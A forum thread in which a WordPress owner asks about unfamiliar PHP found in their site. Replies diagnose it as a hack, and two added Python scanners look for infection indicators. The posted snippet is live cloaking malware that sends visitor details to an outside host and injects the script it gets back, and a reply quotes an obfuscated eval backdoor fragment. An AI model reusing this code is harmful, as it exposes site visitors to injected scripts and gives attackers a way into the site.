trival
I saw this code in my WordPress website. I was wondering what this code is, because I can't remember putting this code in my site.

here it is.

<?php
$wp_rssh = 'http';
$wp_gt = 'get';
error_reporting(0);
ini_set('display_errors',0);
$wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
    $wp_gturl=$wp_rssh."://".$wp_rssh."s".$wp_gt.".com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
    $ch = curl_init();
    curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 10);
    $wp_cntnt = curl_exec ($ch);
    curl_close($ch);
}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; }
?>
 
14 comments
Remove the code. If the site and all plugins are functioning, then perfect. If the site and only one plugin is not functioning, then you've got a problem. Or it could be because of your theme.
 
Your WordPress has been compromised. header.php is not the only file someone has changed.

Check functions, and all major files. Also in wp-include check for wp-log.php; that file will probably have a different date of upload because someone has added it.
 
In wp-log.php I found this: preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\ . It really looks like I got hacked :(
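A scan for the indicators quoted in this thread, as an added example (not code from the thread or from WordPress): it decodes the \xHH escapes that hide the wp-log.php payload, flags the patterns in the header.php snippet (error reporting switched off, a browser check on the User-Agent, curl output echoed into the page) and lists PHP files newest first, which is the "different date of upload" clue from the reply above. The sample tree, its paths and timestamps are constructed, and the copy of the header snippet is trimmed to the lines the checks need.

```python
"""Scan WordPress PHP files for the indicators shown in this thread (added example)."""
import os
import re
import tempfile
import time

# \xHH escapes inside a PHP double-quoted string.
HEX_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{2})')

# Each indicator: a label and a regex applied to the escape-decoded source.
INDICATORS = [
    ("preg_replace() with the /e modifier (evaluates the replacement as PHP)",
     re.compile(r'preg_replace\s*\(\s*["\']/[^"\']*/[a-zA-Z]*e[a-zA-Z]*["\']')),
    ("eval() of decompressed or decoded data",
     re.compile(r'eval\s*\(\s*(gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(')),
    ("error reporting switched off",
     re.compile(r'error_reporting\s*\(\s*0\s*\)')),
    ("browser/OS check on the User-Agent (cloaking)",
     re.compile(r'preg_match\s*\(\s*["\']/[^"\']*(Firefox|MSIE|Googlebot)[^"\']*/')),
]

# Constructed samples: a trimmed copy of the header.php snippet and the wp-log.php
# fragment quoted in the thread, plus one clean file.
INFECTED_HEADER = r"""<?php $wp_rssh = 'http'; $wp_gt = 'get'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL, $wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>"""
WP_LOG_FRAGMENT = r'<?php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61"); ?>'
CLEAN = "<?php echo get_bloginfo('name'); ?>"


def decode_php_hex_escapes(text: str) -> str:
    """Replace PHP \\xHH escapes with the characters they encode."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def scan_php_source(raw: str) -> list:
    """Return the labels of every indicator found in one PHP file's source."""
    decoded = decode_php_hex_escapes(raw)
    hits = [label for label, rx in INDICATORS if rx.search(decoded)]
    # Remote content pulled with curl and echoed straight into the page.
    if re.search(r'curl_exec\s*\(', decoded) and re.search(r'echo\s+\$\w+', decoded):
        hits.append("curl_exec() output echoed into the page")
    # A long run of \xHH escapes is a string someone wanted to hide from grep.
    if len(HEX_ESCAPE.findall(raw)) >= 8:
        hits.append("long run of \\xHH escapes (obfuscated string)")
    return hits


def build_sample_tree() -> str:
    """Write the constructed samples into a temp dir shaped like a WordPress install,
    backdating the clean file so the injected ones stand out by mtime."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    now = time.time()
    samples = {
        "index.php": (CLEAN, now - 90 * 86400),
        os.path.join("wp-content", "themes", "mytheme", "header.php"): (INFECTED_HEADER, now - 86400),
        os.path.join("wp-includes", "wp-log.php"): (WP_LOG_FRAGMENT, now),
    }
    for rel, (src, mtime) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(src)
        os.utime(path, (mtime, mtime))
    return root


def scan_tree(root: str) -> list:
    """Walk a WordPress tree and return (mtime, path, hits) for every PHP file,
    newest first, so a file modified apart from the rest of the install stands out."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read())
            results.append((os.path.getmtime(path), path, hits))
    results.sort(reverse=True)
    return results


if __name__ == "__main__":
    for mtime, path, hits in scan_tree(build_sample_tree()):
        flag = "SUSPECT" if hits else "ok"
        print(f"{time.strftime('%Y-%m-%d', time.localtime(mtime))}  {flag:7} {path}")
        for h in hits:
            print("    -", h)
```

Point scan_tree at a real install root instead of build_sample_tree() to use it; the regexes are indicator checks, not a virus scanner, so review each hit by hand and compare the file against a clean copy of the same WordPress or theme version.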
 
I finally removed the wp-login.php and it worked fine till I saw weird crawl errors from Webmaster Tools.

like this : http://www.sample.com/MyPage/1345363990000/1345971325000

What's with the numbers? I only created MyPage, and then I saw crawl 404 errors in Webmaster Tools :( lots of them, 300 per day.
 
If I were you, I'd do an SQL backup, find another decent clean theme and just start from there. It seems that those theme files are now dirty, and most probably have infected your server/VPS.
 
"&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent)

Looks like a shell to me. Check for backdoors, remove any new files.
 
Where did you get your theme from? A lot of "nulled" script sites release themes with nasty hidden things in. If you have a timthumb file make sure it's up to date. If you like I can have a look for you.
 
It's an SEO spam hack, creates fake pages with linkbacks. I've seen it a lot, most likely there are also other compromised files.

My advice, use the latest WordPress version (and versions of your plugins). And under no circumstances use nulled themes.

For one it rips off the developer, two unless you know PHP and check over them there is a good chance that you will have a shell or similar code in there somewhere.

Do a rebuild.
Keep the database and any uploaded files, although go through them looking for any .php files.
And be more careful in the future.
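The "go through the uploads looking for .php files" step from the reply above, as an added example (not code from the thread or from WordPress). It goes a little beyond the reply: besides files whose name would run as PHP, including double extensions such as name.php.jpg, it also flags files of any extension whose first bytes contain a PHP open tag, since nothing under wp-content/uploads should ever contain server-side code. The uploads tree, file names and contents are constructed; the executable-extension list assumes a typical mod_php setup and should be adjusted to your host.

```python
"""List files under wp-content/uploads that would run as, or contain, PHP (added example)."""
import os
import tempfile

# Extensions a typical mod_php handler executes (assumption; adjust for your host).
PHP_EXTENSIONS = (".php", ".php5", ".php7", ".phtml", ".phar")
# Open tags that start PHP code, looked for in the first 4 KB of every file.
PHP_OPEN_TAGS = (b"<?php", b"<?=", b'<script language="php"')


def find_php_in_uploads(uploads_root: str) -> list:
    """Return sorted (relative path, reasons) for every file that would run as PHP
    by name, or that carries a PHP open tag whatever its extension."""
    found = []
    for dirpath, _, files in os.walk(uploads_root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            # Every extension after the first dot counts, so name.php.jpg is caught.
            parts = name.lower().split(".")[1:]
            if any("." + p in PHP_EXTENSIONS for p in parts):
                reasons.append("php extension")
            with open(path, "rb") as fh:
                head = fh.read(4096)
            if any(tag in head for tag in PHP_OPEN_TAGS):
                reasons.append("php open tag in content")
            if reasons:
                found.append((os.path.relpath(path, uploads_root), reasons))
    return sorted(found)


def build_sample_uploads() -> str:
    """Constructed uploads tree: one real-looking JPEG, one .php file, one JPEG with a
    double extension, and one PNG whose body carries a PHP open tag."""
    root = tempfile.mkdtemp(prefix="uploads-sample-")
    jpeg_magic = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    png_magic = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
    files = {
        os.path.join("2012", "08", "photo.jpg"): jpeg_magic,
        os.path.join("2012", "08", "upload.php"): b"<?php /* constructed placeholder */ ?>",
        os.path.join("2012", "08", "image.php.jpg"): jpeg_magic,
        os.path.join("2012", "09", "thumb.png"): png_magic + b"<?php /* constructed placeholder */ ?>",
    }
    for rel, data in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for rel, reasons in find_php_in_uploads(build_sample_uploads()):
        print(f"{rel}: {', '.join(reasons)}")
```

Run find_php_in_uploads against the real wp-content/uploads directory of the backup before restoring it; anything it lists does not belong there, and the usual hardening after the rebuild is to have the web server refuse to execute PHP under the uploads directory at all.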
 